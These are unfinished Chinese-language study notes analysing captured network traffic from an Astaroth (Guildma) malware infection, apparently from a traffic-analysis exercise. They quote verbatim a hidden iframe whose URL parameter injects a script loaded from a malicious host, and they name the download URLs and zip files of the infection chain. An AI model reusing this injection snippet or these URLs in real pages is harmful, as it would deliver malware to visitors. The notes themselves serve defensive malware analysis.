DATA DUMP FROM ASTAROTH (GUILDMA) MALWARE INFECTION

2024-04-05 (THURSDAY): DATA DUMP FROM ASTAROTH (GUILDMA) MALWARE INFECTION

学习记录

HTTP流

首先查看HTTP流,并追踪第一条流

返回的HTML代码的作用是在当前页面中嵌入了一个 iframe元素,该 iframe加载了指定的 URL。该 URL 中的参数 searchString 包含了一些JavaScript代码,其中引入了 jQuery库,并加载了另一个JavaScript 文件

1
2
3
<body style="margin:0;padding:0;">
<iframe style="position:relative; top: -104px; left: -141px;width:10;height:10" allowtransparency="true" src="https://biosuperdeal.be/index.php?searchString=%3Cscript%20src=%22https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js%22%3E%3C/script%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://eeiufr.neoburst.company/74262421815720Z1iFaTEnQ76IoEzkmhPMkFUzvGd2Vk4o2934293112/Imprimir_DACTEs_73262593.doa_..%22%3E">
</body>

追踪第二条HTTP流,发现其响应了一个JS代码

这个JS代码的变量名和函数名看起来都是随机生成的

使用了WScript.Shell对象,这通常用于执行系统命令

KUGvzmueVhJnAlPYGL函数用于生成一个值,根据值的不同ykCZgNvJcLaKRUUaoTjd被赋予不同的地址

后面似乎还运行了CMD命令,看起来似乎是恶意代码

将下面流的域名e9h47j3aey4.findbusca.store在上一条流中的地址中查找,发现存在。可能的情况是用户访问了http://eeiufr.neoburst.company/74262421815720Z1iFaTEnQ76IoEzkmhPMkFUzvGd2Vk4o2934293112/Imprimir_DACTEs_73262593.do然后JS代码执行,随后访问了http://e9h47j3aey4.findbusca.store/?77226593077628733

追踪这条流,首先请求服务器返回http://e9h47j3aey4.findbusca.store/?77226593077628733HTTP标头信息,发现其是.zip文件

同样方法查看,发现其返回了几个.zip文件,分别为gltGlAzqRU.zip、CoAaOeqlDZ.zip、xIARkijOeZ.zip、AyxnzbzCdp.zip,下载后分析(注意:请勿在个人电脑上下载,请在虚拟机内分析


第一个是一个可执行文件,通过查询其sha256值,发现其为恶意软件

后面这三个不知道是什么东西,剩下的就没什么思路了(有其他的想法请twitter

(以下未完成)

线索梳理

  • Environment(调查的资产信息/环境)
    • LAN segment range
    • Domain
    • Domain controller
    • LAN segment gateway
    • LAN segment broadcast address
  • Incident Report
    • Executive summary(感染过程总结)
    • Victim details(受害者细节)
      • IP address
      • MAC address
      • User account name
    • Indicators of compromise (IOCs)
      • SHA256 hash
      • File size
      • File name
      • File location
      • File description:
    • HTTP traffic to retrieve the malware
      • 即 下载恶意文件的HTTP流量记录
    • HTTP traffic for remote request infection activity
      • 即 感染相关的远程请求活动的HTTP流量记录
    • INVESTIGATION(调查过程)
      • 最后可以给一个精简的流程图

知识

参考